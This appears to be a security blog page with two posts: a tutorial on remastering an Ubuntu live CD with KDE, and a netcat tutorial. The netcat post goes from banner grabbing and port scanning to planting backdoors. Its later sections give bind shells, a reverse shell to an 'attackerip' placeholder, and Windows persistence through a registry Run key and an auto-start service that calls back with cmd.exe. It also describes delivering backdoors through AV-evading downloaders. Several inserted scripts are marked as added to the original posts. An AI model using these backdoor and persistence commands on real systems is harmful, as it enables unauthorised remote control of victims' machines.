Good bye GNOME 3 and Unity, we are getting back to KDE (Ubuntu live CD customization)

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

We all know Ubuntu's Unity and GNOME Shell are frustrating and crazy. They treat us like seven-year-old kids who love flashy effects and pretty pictures. So I am not going to use GNOME (not too bad, but bad enough) or Unity at all. Perhaps the people behind them are permanent Windows users, lol, and now they are trying to rip off Windows. So I customised my Ubuntu 12.04 and installed a KDE-based interface instead. KDE is a solid GUI, and many distributions such as Debian, Red Hat Enterprise Linux, openSUSE, Kubuntu and Arch Linux ship it. Ubuntu live CD customization is not too hard; if you want to customize your own ISO, just follow this tutorial.
Would you believe that I was not even able to take all the screenshots while writing this article? Perhaps I can't, and I don't want to try. I don't think any power user or pentester will use GNOME 3 or Unity. When I installed GNOME Shell on Ubuntu 12.04 I saw that it can fall back to the classic style, but the classic style is also poor, although somehow usable.
Frankly, I have used both KDE and GNOME. When I installed Ubuntu 11.10 and 12.04, it just made me cry!!
Anyway, if you don't want to install KDE, Xfce or another interface over and over every time you install a fresh OS, or if you decide to make your own Ubuntu-based Linux distro with some hacking/pentesting tools on the CD, then this tutorial is for you.
First, install the tools we need:
sudo apt-get install squashfs-tools genisoimage
Now we create a folder for our work:
mkdir kde-linux
Move or copy the ISO into your working folder:
mv ubuntu-12.04-desktop-i386.iso kde-linux/
and
cd kde-linux
Now we need to mount the ISO. First create a mount point:
mkdir mnt
Now mount the ISO on mnt (read-only; this needs root):
sudo mount -o loop,ro ubuntu-12.04-desktop-i386.iso mnt
Extract the ISO into a directory, leaving out the big squashfs, which we are going to rebuild:
mkdir extracted
rsync --exclude=/casper/filesystem.squashfs -a mnt/ extracted
Now extract the squashfs filesystem. This takes a while, so wait:
sudo unsquashfs mnt/casper/filesystem.squashfs
When extraction hits 100%, rename the result to edit:
sudo mv squashfs-root edit
What now? We chroot into edit as root so we can customize everything. But before that, copy in working DNS settings (otherwise apt cannot resolve anything inside the chroot) and bind-mount /dev:
sudo cp /etc/resolv.conf edit/etc/
sudo cp /etc/hosts edit/etc/
sudo mount --bind /dev/ edit/dev
 
 
Now chroot, so that you can install anything you want (some hacking tools too, hehe):
sudo chroot edit

Inside the chroot, mount the virtual filesystems that dpkg and apt expect:

mount -t proc none /proc
mount -t sysfs none /sys
mount -t devpts none /dev/pts

Then set a sane environment:
export HOME=/root
export LC_ALL=C
We are almost ready. Two more things: give dbus a machine-id, and divert initctl so that package postinst scripts cannot try to start upstart services inside the chroot (we undo both before packing the image):
dbus-uuidgen > /var/lib/dbus/machine-id
dpkg-divert --local --rename --add /sbin/initctl
ln -s /bin/true /sbin/initctl
 
Now we can install anything we want. Let's install KDE first; the choices are kde-plasma-desktop (minimal), kde-full and kubuntu-desktop. First run:
apt-get update
Now run:
apt-get install kde-plasma-desktop
Oh no, I got an error here, which you may or may not see with your ISO:

apt-get install kde-plasma-desktop
Reading package lists… Done
Building dependency tree
Reading state information… Done
E: Unable to locate package kde-plasma-desktop
So I looked at the sources.list:
nano /etc/apt/sources.list
and found only 3 sources. The live CD's sources.list is minimal and leaves out the repository components where these packages live, so apt cannot see them. The quick fix is to take the sources.list from an installed Ubuntu. In another terminal, outside the chroot:
gedit /etc/apt/sources.list
Copy all the sources and paste them into the sources.list you are editing inside the chroot, or simply replace the file with cp from outside the chroot (the target is edit/etc/apt/sources.list).
Now run apt-get update again and search for the package we want:
apt-cache search kde-plasma-desktop

kde-plasma-desktop - KDE Plasma Desktop and minimal set of applications
apt-get install kde-plasma-desktop
or you can install kde-full instead:
apt-get install kde-full
It will download about 103 megabytes, so wait until it finishes. kde-full or kubuntu-desktop will download a lot more. I prefer the minimal package, since I just want to leave GNOME.
Anyway, if you want to install any other software:
apt-get install packagename    # for example: apt-get install vlc
apt-get install nmap
apt-get install skipfish
apt-get install gimp ksnapshot sqsh
If you want to install a .deb file downloaded from the internet, copy it into the chroot tree from outside, for example into kde-linux/edit/home/somefolder (skype.deb is just an example name):

cp skype.deb kde-linux/edit/home/somefolder

Then, in your chrooted terminal:

cd /home/somefolder

dpkg -i skype.deb

If dpkg complains about missing dependencies, apt-get -f install pulls them in.

Now that everything we need is installed, it is time to build the ISO. First remove everything we created inside the chroot (running apt-get clean first also drops the downloaded package cache, which would otherwise bloat the image):
rm -rf /tmp/* ~/.bash_history
rm /etc/hosts
rm /etc/resolv.conf
rm /var/lib/dbus/machine-id
rm /sbin/initctl
dpkg-divert --rename --remove /sbin/initctl
Now unmount whatever we mounted, leave the chroot, and unmount the /dev bind mount from outside:
umount /proc
umount /sys
umount /dev/pts
exit
sudo umount edit/dev
                                                                                             
 
 
Now the real thing. Regenerate the package manifests: the live system reads filesystem.manifest, while filesystem.manifest-desktop lists what stays after installation, so the installer (ubiquity) and the live-boot pieces (casper) are removed from it:
chmod +w extracted/casper/filesystem.manifest

sudo chroot edit dpkg-query -W --showformat='${Package} ${Version}\n' > extracted/casper/filesystem.manifest

cp extracted/casper/filesystem.manifest extracted/casper/filesystem.manifest-desktop

sed -i '/ubiquity/d' extracted/casper/filesystem.manifest-desktop

sed -i '/casper/d' extracted/casper/filesystem.manifest-desktop
Now compress the filesystem (this takes some time). If you are rebuilding and an old filesystem.squashfs is still in extracted/casper, delete it first, because mksquashfs appends to an existing image instead of replacing it:
sudo mksquashfs edit extracted/casper/filesystem.squashfs
We also need to update the size file, otherwise the installer's free-space check will be wrong:
printf $(sudo du -sx --block-size=1 edit | cut -f1) > extracted/casper/filesystem.size
Now regenerate the checksums:
cd extracted
rm md5sum.txt
find -type f -print0 | sudo xargs -0 md5sum | grep -v isolinux/boot.cat | sudo tee md5sum.txt
We are almost done. Set IMAGE_NAME to the volume label you want (for example export IMAGE_NAME="Ubuntu 12.04 KDE") and build the bootable ISO:
mkisofs -D -r -V "$IMAGE_NAME" -cache-inodes -J -l -b isolinux/isolinux.bin -c isolinux/boot.cat -no-emul-boot -boot-load-size 4 -boot-info-table -o ../your-new-linux-name.iso .
Now just burn the ISO to a blank DVD (or boot it in a VM first to test it) and enjoy.
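The whole procedure above collected into one script, as an added example that is not part of the original post: it runs the same steps with error checking and always cleans up its mounts. It assumes you run it as root, pass the ISO, the output file name and the packages to install as arguments, and keep the tutorial's directory names (mnt/, extracted/, edit/); the volume label is my choice, not the post's.

```shell
#!/bin/sh
# Added example (not from the original post): the remaster procedure as one script with
# error checking, so a failed step does not leave stale mounts behind.
# Assumptions: run as root; ISO, output name and package list are arguments; the
# directory names (mnt/, extracted/, edit/) follow the tutorial. Example invocation:
#   sudo sh remaster.sh ubuntu-12.04-desktop-i386.iso my-kde.iso kde-plasma-desktop nmap
set -eu

# Pure helper: what the two sed commands in the tutorial do. filesystem.manifest-desktop
# is the package list that survives installation, so the installer (ubiquity) and the
# live-boot pieces (casper) are dropped from it.
filter_desktop_manifest() {
    grep -v -e ubiquity -e casper "$1" || true
}

# Pure helper: byte count of the unpacked root, the value casper/filesystem.size holds.
rootfs_size_bytes() {
    du -sx --block-size=1 "$1" | cut -f1
}

need_tools() {
    for t in unsquashfs mksquashfs mkisofs rsync; do
        command -v "$t" >/dev/null 2>&1 \
            || { echo "missing $t: apt-get install squashfs-tools genisoimage rsync" >&2; exit 1; }
    done
}

# The pseudo-filesystems dpkg and apt expect inside the chroot.
mount_chroot() {
    mount --bind /dev "$1/dev"
    mount -t proc none "$1/proc"
    mount -t sysfs none "$1/sys"
    mount -t devpts none "$1/dev/pts"
}
umount_chroot() {
    for m in dev/pts sys proc dev; do umount "$1/$m" 2>/dev/null || true; done
}

remaster() {
    iso=$1; out=$2; shift 2; pkgs=$*
    need_tools
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; exit 1; }
    mkdir -p mnt extracted
    mount -o loop,ro "$iso" mnt
    # Whatever happens from here on, leave no mounts behind: a forgotten bind mount on
    # edit/dev is what makes a later umount or rm -rf edit go badly wrong.
    trap 'umount_chroot edit; umount mnt 2>/dev/null || true' EXIT
    rsync --exclude=/casper/filesystem.squashfs -a mnt/ extracted
    unsquashfs -d edit mnt/casper/filesystem.squashfs
    cp /etc/resolv.conf /etc/hosts edit/etc/
    cp /etc/apt/sources.list edit/etc/apt/sources.list   # the live CD's list is too short
    mount_chroot edit
    # machine-id keeps dbus happy; the initctl diversion stops postinst scripts from
    # starting upstart services inside the chroot. Both are undone before packing.
    HOME=/root LC_ALL=C DEBIAN_FRONTEND=noninteractive chroot edit /bin/sh -ec "
        dbus-uuidgen > /var/lib/dbus/machine-id
        dpkg-divert --local --rename --add /sbin/initctl && ln -s /bin/true /sbin/initctl
        apt-get update && apt-get install -y $pkgs && apt-get clean
        rm -rf /tmp/* /root/.bash_history /etc/hosts /etc/resolv.conf /var/lib/dbus/machine-id
        rm /sbin/initctl && dpkg-divert --rename --remove /sbin/initctl"
    umount_chroot edit
    chroot edit dpkg-query -W --showformat='${Package} ${Version}\n' > extracted/casper/filesystem.manifest
    filter_desktop_manifest extracted/casper/filesystem.manifest > extracted/casper/filesystem.manifest-desktop
    rm -f extracted/casper/filesystem.squashfs   # mksquashfs appends to an existing image
    mksquashfs edit extracted/casper/filesystem.squashfs
    rootfs_size_bytes edit > extracted/casper/filesystem.size
    (cd extracted && rm -f md5sum.txt \
        && find . -type f -print0 | xargs -0 md5sum | grep -v -e isolinux/boot.cat -e md5sum.txt > md5sum.txt)
    mkisofs -D -r -V "Custom KDE live" -cache-inodes -J -l \
        -b isolinux/isolinux.bin -c isolinux/boot.cat -no-emul-boot -boot-load-size 4 \
        -boot-info-table -o "$out" extracted
    echo "built $out"
}

# Only run the procedure when called with arguments; the helpers above can be sourced alone.
if [ $# -ge 3 ]; then remaster "$@"; fi
```

The two helpers at the top are plain functions so they can be checked on their own; everything that needs root lives in remaster. The trap on EXIT is worth copying even if you keep doing the steps by hand: a stale bind mount on edit/dev is what turns a later rm -rf edit into a disaster for the host's /dev.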
If you want to customize the boot splash, you need more advanced knowledge, because the splash is handled by plymouth (/lib/plymouth) and the kernel.
I say goodbye to Unity and GNOME!!!! You drove the power users crazy. Fix it soon.

Email me if you have any questions. 

Power of netcat

Netcat is not really a hacking tool; it is a networking tool. We can use it to communicate with other computers remotely, transfer data, chat, etc. But we can also use it as a backdoor or a hacking tool. For example, "ping" is not a hacking or DoS tool, but we can DoS someone with ping, no? That does not make it a DDoS tool.

Anyway, netcat is often called the "Swiss Army Knife" of networking.

I will explain its basic usage now.


All the options in netcat (the output below is from the Debian netcat-traditional package, v1.10; the OpenBSD netcat that Ubuntu installs by default has a different flag set and, notably, no -e):

nc -h
[v1.10-38]
connect to somewhere:   nc [-options] hostname port[s] [ports] …
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, …
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

We can use netcat as a backdoor, for banner grabbing, port scanning, chatting, file transfer, traffic redirection and more.

Banner Grabbing :

root@linux:~# nc -vvv 192.168.96.129 80
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 80 (www) open
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Sat, 14 Apr 2012 07:20:01 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
Content-Length: 368
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1 Server at localhost Port 80</address>
</body></html>
 sent 16, rcvd 617

How: nc -vvv ip port, type GET / HTTP/1.1 and hit Enter twice; the blank line ends the request. (The 400 Bad Request comes from HTTP/1.1 requiring a Host: header, which we did not send, but the server still answered with its full Server line, which is all we wanted.)

Simply put, we see that the web server is Apache 2.2.21 (Win32), and not only that: we also get the OpenSSL, PHP and mod_perl versions. Do you know how a scanner checks a target for vulnerabilities? It first fingerprints the server/application version, then looks it up in its local database (Nessus, Acunetix, etc.). We can do the same by hand, searching Google for vulnerabilities in that specific version, no?

The same way we can find other application version, information:

 root@linux:~# nc -vvv 192.168.96.129 21
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 21 (ftp) open
220 FileZilla Server version 0.9.39 beta written by Tim Kosse (Tim.Kosse@gmx.de) Please visit http://sourceforge.

 
You can try connecting to any port except 443 (or any other TLS-wrapped service), since netcat cannot speak SSL/TLS. For those, use openssl s_client -connect host:443 or ncat --ssl from the Nmap project, or tunnel through a TLS proxy such as stunnel.
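A small recon helper built on the flags above, added here as an example and not part of the original post. It assumes the Debian netcat-traditional build whose help is shown above (its -vz output format is what the parser expects) and takes the target host and ports from the caller; the host names, ports and sample response in the code are placeholders or constructed.

```shell
#!/bin/sh
# Added example (not from the original post): banner grabbing and -z scanning wrapped in
# shell functions, using the Debian netcat-traditional flags shown in the help above.
# Assumed: target host and ports come from the command line; the only thing taken from
# the post is the shape of the '(UNKNOWN) [ip] port (svc) open' lines the parser reads.
set -eu

# Ask properly: HTTP/1.1 requires a Host header, which is why the hand-typed request in
# the post got a 400. -w bounds how long we wait for the final read; sed stops at the
# blank line that ends the headers.
http_headers() {
    host=$1; port=${2:-80}
    printf 'HEAD / HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' "$host" \
        | nc -w 5 "$host" "$port" | tr -d '\r' | sed '/^$/q'
}

# Pure helper: pull the Server header value out of captured response text.
# Prints nothing if the server hides it (Apache's ServerTokens Prod, for example).
server_banner() {
    printf '%s\n' "$1" | tr -d '\r' | sed -n 's/^[Ss]erver:[[:space:]]*//p' | head -n 1
}

# Services that talk first (FTP, SMTP, SSH): read one line and hang up.
greeting() {
    nc -w 5 "$1" "$2" </dev/null | head -n 1 | tr -d '\r'
}

# Pure helper: turn 'nc -vz' output into a list of open ports. Traditional netcat writes
# one line per port on stderr in the shape the post shows:
#   (UNKNOWN) [192.168.96.129] 80 (www) open
open_ports_from() {
    printf '%s\n' "$1" | awk '/ open$/ { print $(NF-2) }'
}

# -z: connect and immediately close, no data sent. -w 1 keeps filtered ports from
# stalling the scan; -n skips the reverse lookup that timed out in the post.
scan_open_ports() {
    host=$1; ports=$2
    open_ports_from "$(nc -vnz -w 1 "$host" $ports 2>&1 || true)"
}

# Scan a range, then grab a banner from each open port: HTTP ports get a real request,
# everything else gets a read of its greeting.
recon() {
    host=$1; ports=${2:-1-1024}
    for p in $(scan_open_ports "$host" "$ports"); do
        case $p in
            80|8080|8000) banner=$(server_banner "$(http_headers "$host" "$p")") ;;
            *)            banner=$(greeting "$host" "$p") ;;
        esac
        printf '%s:%s\t%s\n' "$host" "$p" "${banner:-<no banner>}"
    done
}

# Usage: recon 192.168.96.129 1-1024
```

The parsing functions are kept separate from the ones that touch the network, so the format handling can be checked offline; only scan_open_ports and recon need a live target.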

Chat with your hacker friend:

Suppose there are two hackers called hacker1 and hacker2. They don't want to get caught using another messenger, or they just want a private channel.

How do they do it? Simple commands:

hacker1 (netcat listening):

nc -vvv -l -p 4444

-vvv stands for verbose (as much as possible)

-l for listening (opening the port for inbound connections)

-p for the local port to listen on

hacker2 (connecting to hacker1):

nc -vvv 192.168.96.129 4444    (4444 is the port hacker1 opened; whatever either side types is sent to the other, in cleartext)

(screenshots of hacker1's and hacker2's terminals)

Transfer a file:

Hackers do not want to move files through public file-sharing servers because of the risk, but they can use netcat to transfer files directly. Keep in mind that netcat sends the bytes in cleartext, so anyone on the path can read them.

Suppose hacker1 (blackhat) has a passwords file on his computer (192.168.96.129) and wants to send it to hacker2 (192.168.1.213).

hacker1's netcat command:

nc -vvv -q 1 -l -p 4444 < passwords.txt

hacker2's netcat command:

nc -vvv 192.168.96.129 4444 > passwords.txt

The -q 1 tells netcat to close the connection one second after it hits end of file on stdin; without it both sides just sit there after the file has been sent until you press Ctrl-C.
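The same transfer as functions, added as an example that is not from the original post, with two things the bare commands lack: a clean end of stream (-q 1) and a digest check on the receiving side, plus an encrypted variant since plain netcat is cleartext. It assumes netcat-traditional flags, sha256sum on both ends and openssl for the encrypted pair; the file names, ports and passphrase are placeholders.

```shell
#!/bin/sh
# Added example (not from the original post): the netcat file transfer above with a clean
# end of stream and an integrity check, plus an encrypted variant.
# Assumed: netcat-traditional flags (-l -p, -q), sha256sum on both ends, openssl for the
# encrypted functions. Hosts, ports and the passphrase are supplied by the caller.
set -eu

# Pure check: does the received file match the SHA-256 the sender published? netcat
# adds no framing, so a transfer cut short looks like success until you check this.
digest_matches() {
    actual=$(sha256sum "$1" | cut -d' ' -f1)
    [ "$actual" = "$2" ]
}

# Sender: print the digest (hand it over out of band), then serve the file. -q 1 closes
# the connection one second after stdin hits EOF; without it both sides hang forever.
serve_file() {
    file=$1; port=$2
    sha256sum "$file" | cut -d' ' -f1
    nc -q 1 -l -p "$port" < "$file"
}

# Receiver: pull the stream, then refuse to use it unless the digest matches.
fetch_file() {
    host=$1; port=$2; out=$3; expected=$4
    nc -w 10 "$host" "$port" > "$out"
    digest_matches "$out" "$expected"
}

# Same thing, but the wire carries AES-256-CBC ciphertext instead of the file itself
# (plain netcat is cleartext; anyone on the path reads it). The passphrase is shared
# out of band, like the digest.
serve_file_enc() {
    file=$1; port=$2; pass=$3
    sha256sum "$file" | cut -d' ' -f1
    openssl enc -aes-256-cbc -pbkdf2 -salt -pass "pass:$pass" -in "$file" | nc -q 1 -l -p "$port"
}
fetch_file_enc() {
    host=$1; port=$2; out=$3; expected=$4; pass=$5
    nc -w 10 "$host" "$port" | openssl enc -d -aes-256-cbc -pbkdf2 -pass "pass:$pass" -out "$out"
    digest_matches "$out" "$expected"
}

# Usage (two machines):
#   hacker1$ serve_file passwords.txt 4444                       # prints the digest
#   hacker2$ fetch_file 192.168.96.129 4444 passwords.txt <digest> && echo intact
```

The digest is printed on the sender's side rather than sent down the same socket on purpose: if the channel can be tampered with, a checksum that travels with the data proves nothing.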

             
Let's do a port scan with netcat:

We can scan ports with the simple command nc -vvv targetip 1-65535

or

nc -vvv -z targetip 1-65535

The extra -z is zero-I/O mode: netcat just connects and closes without sending any data, so it only reports which ports are open. Add -w 1 to cap the connect timeout on filtered ports, and -n to skip the reverse DNS lookup you saw failing above.

Simple backdoor with netcat:

Windows server mode:

nc -L -p 1337 -e cmd.exe

-L: "listen harder", i.e. re-listen after the client disconnects (Windows build only).
-e: run cmd.exe and attach it to the connection.

Linux/Unix server mode:

nc -l -p 1337 -k -e /bin/bash

-k sets the TCP keepalive option on the socket (see the help above); in this traditional netcat it does not make the listener persistent, so once the client disconnects the listener exits unless you wrap the command in a shell loop.
-e runs /bin/bash on the connection. The OpenBSD netcat has no -e at all.

Connect to the server:

nc -vv targetip 1337

How about a reverse connection? Try the following on the victim machine:

nc -e cmd.exe -d attackerip 1337

(-d detaches netcat from the console on Windows, so no window is left open.)

On your own computer (attacker):

nc -vv -l -k -p 1337

Now you are wondering how a hacker gets netcat onto the victim's computer, right?

1. They first compromise the target system/server. Then they want permanent access, so they upload a backdoor and register it as a startup application.
2. They create a batch file, shell script or downloader and send it to the victim (undetected by AV). When the victim clicks the script, it downloads and installs the backdoor automatically.

So how do you make netcat a stealthy backdoor? By adding a registry Run entry or dropping it into the Startup folder. Suppose you compromised an IIS web server and uploaded the cmdasp.asp web shell, and now you want netcat as a persistent backdoor.

Netcat as a startup backdoor:

Run this command (the Run key executes its entries whenever a user logs on):

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v microsoft_service /t REG_SZ /d "c:\nc.exe -d attackerip 1337 -e cmd.exe"

Start a netcat listener on your own machine on port 1337. Whenever the victim reboots and logs in, the box connects back to you.

How about netcat as a service? Try:

sc create microsoft_update binPath= "cmd /K start c:\nc.exe -d attackerip 1337 -e cmd.exe" start= auto error= ignore

Note the space after each = sign; sc requires it. cmd.exe is not a real service binary, so the service control manager will report the service as failed to start, but the netcat process it launched keeps running.

Now try to make the backdoor connect back to you on a schedule (hint: the at command).
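The same tricks seen from the defender's chair, as an added example that is not part of the original post: a shell check that reads the text a Windows box prints for reg query ...\Run or sc qc and flags entries that look like a netcat backdoor. The sample registry and service output is constructed for this example, and the IP, service names and paths in it are placeholders.

```shell
#!/bin/sh
# Added example (not from the original post): the defender's side of the persistence
# tricks above. flag_netcat_autoruns reads lines as printed by 'reg query ...\Run' or
# 'sc qc <service>' (collected from the Windows box) and prints the entries that look
# like a netcat backdoor. The sample data below is constructed; IP, names and paths
# are placeholders.
set -eu

# Two independent tells, so renaming nc.exe is not enough to slip past:
#  1. the binary is called nc / ncat / netcat (with or without .exe), as a whole word
#  2. the command line has -e followed by a shell: netcat's "program to exec" flag
flag_netcat_autoruns() {
    grep -Ei \
        -e '(^|[\\/[:space:]"])(nc|ncat|netcat)(\.exe)?([[:space:]"]|$)' \
        -e '-e[[:space:]]+(cmd(\.exe)?|/bin/(ba)?sh|powershell(\.exe)?)([[:space:]"]|$)' \
        || true
}

# Constructed sample: what the Run key and a service query might show on a box where
# someone ran the reg add / sc create commands from the post, mixed with normal entries.
# The last Run entry is a renamed copy of netcat, which only the -e rule catches.
sample_autoruns() {
    cat <<'EOF'
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    OneDrive          REG_SZ           "C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Sync              REG_SZ           C:\tools\sync.exe
    microsoft_service REG_SZ           c:\nc.exe -d 10.0.0.5 1337 -e cmd.exe
    updater           REG_SZ           C:\Windows\svchost32.exe -d 10.0.0.5 1337 -e cmd.exe

SERVICE_NAME: microsoft_update
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : cmd /K start c:\nc.exe -d 10.0.0.5 1337 -e cmd.exe
EOF
}

# Number of suspicious lines in a report; handy as a one-line check in a triage script.
count_flagged() {
    n=$(printf '%s\n' "$1" | flag_netcat_autoruns | grep -c . || true)
    echo "${n:-0}"
}

# Usage: sample_autoruns | flag_netcat_autoruns
```

Word boundaries matter here: a naive grep for "nc" would flag sync.exe and OneDrive.exe, while the renamed svchost32.exe would only be caught by the -e rule. Neither rule helps once the binary is wrapped in a script or the shell is launched some other way, so treat this as a first pass over autoruns, not a full answer.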

By the way, you can do much more with netcat. Netcat is not bad as a backdoor, and if you can modify netcat's C source it can become a super backdoor.
Try more....

More about it:

www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
en.wikipedia.org/wiki/Netcat
www.securityfocus.com/tools/139  (Download for windows)